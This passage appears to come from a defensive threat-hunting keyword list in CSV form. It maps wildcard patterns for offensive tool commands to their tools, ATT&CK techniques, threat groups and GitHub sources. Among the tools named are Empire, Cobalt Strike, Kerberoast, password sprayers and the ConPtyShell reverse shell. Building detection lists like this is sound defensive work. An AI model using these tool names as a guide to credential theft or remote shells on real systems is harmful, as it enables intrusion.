TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Invoke-AutoKerberoast*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*Invoke-AzElevatedAccessToggle*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-AzRESTBastionShareableLink*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-AzureEnum.ps1*,offensive_tool_keyword,Invoke-AzureEnum,This cmdlet is used to perform users enumeration against Azure,T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1,1,1,N/A,N/A,5,417,85,2023-04-05T22:03:19Z,2019-11-20T22:07:50Z -*Invoke-AzurePasswordSpray*,offensive_tool_keyword,Invoke-AzurePasswordSpray,This cmdlet is used to perform a password spray attack against Azure accounts using legacy Basic Authentication,T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1,1,1,N/A,N/A,5,417,85,2023-04-05T22:03:19Z,2019-11-20T22:07:50Z -*Invoke-AzureRmVMBulkCMD.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-AzVMBulkCMD.ps1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Invoke-BackdoorLNK*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BackdoorLNK.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-BackdoorLNK*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1115,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-BadPotato*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-BadZure*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,1,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*Invoke-BetterSafetyKatz*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Binary *.exe*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*Invoke-BitlockerCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-BlockETW*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-BlockETW*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*InvokeBloodHound*,offensive_tool_keyword,cobaltstrike,Aggressor scripts for use with Cobalt Strike 3.0+,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/C0axx/AggressorScripts,1,0,N/A,10,10,37,12,2019-10-08T12:00:53Z,2019-01-11T15:48:18Z -*Invoke-BloodHound*,offensive_tool_keyword,bloodhound,Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.,T1552 - T1027 - T1059 - T1087,TA0003 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*invoke-bloodhound*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-BloodHound*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Invoke-Bof *,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,0,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*Invoke-Bof.ps1*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,1,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*Invoke-BruteAvailableLogons*,offensive_tool_keyword,PowerBruteLogon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/PowerBruteLogon,1,1,N/A,N/A,2,112,21,2022-03-04T14:12:08Z,2021-12-01T09:40:22Z -*Invoke-BruteForce*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-BruteLogonAccount*,offensive_tool_keyword,PowerBruteLogon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/PowerBruteLogon,1,1,N/A,N/A,2,112,21,2022-03-04T14:12:08Z,2021-12-01T09:40:22Z -*Invoke-BruteLogonList*,offensive_tool_keyword,PowerBruteLogon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/PowerBruteLogon,1,1,N/A,N/A,2,112,21,2022-03-04T14:12:08Z,2021-12-01T09:40:22Z -*Invoke-BSOD*,offensive_tool_keyword,Invoke-BSOD,A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. Also enumeartes Windows crash dump settings.,T1561 - T1059,TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/peewpw/Invoke-BSOD,1,0,N/A,N/A,3,265,73,2018-04-03T13:36:45Z,2018-03-30T14:20:10Z -*Invoke-BuildAnonymousSMBServer -*,offensive_tool_keyword,Invoke-BuildAnonymousSMBServer,Use to build an anonymous SMB file server,T1570 - T1027 - T1071.001,TA0010,N/A,N/A,Data Exfiltration,https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer,1,0,N/A,6,3,222,43,2021-08-20T14:52:10Z,2021-07-10T01:23:43Z -*Invoke-BuildAnonymousSMBServer.ps1*,offensive_tool_keyword,Invoke-BuildAnonymousSMBServer,Use to build an anonymous SMB file server,T1570 - T1027 - T1071.001,TA0010,N/A,N/A,Data Exfiltration,https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer,1,1,N/A,6,3,222,43,2021-08-20T14:52:10Z,2021-07-10T01:23:43Z -*Invoke-BypassUAC*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-BypassUAC*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1123,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-CallbackIEX*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerBreach.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Carbuncle*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Cats -pwds*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*Invoke-Cats.ps1*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*Invoke-Certify*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Certify*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*invokechecklocaladminaccess*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-CheckLocalAdminAccess*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-CheckLocalAdminAccess*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*invoke-checklocaladminaccess*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*Invoke-ClipboardMonitor*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ConPtyShell*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*Invoke-ConPtyShell*,offensive_tool_keyword,nishang,Nishang is a 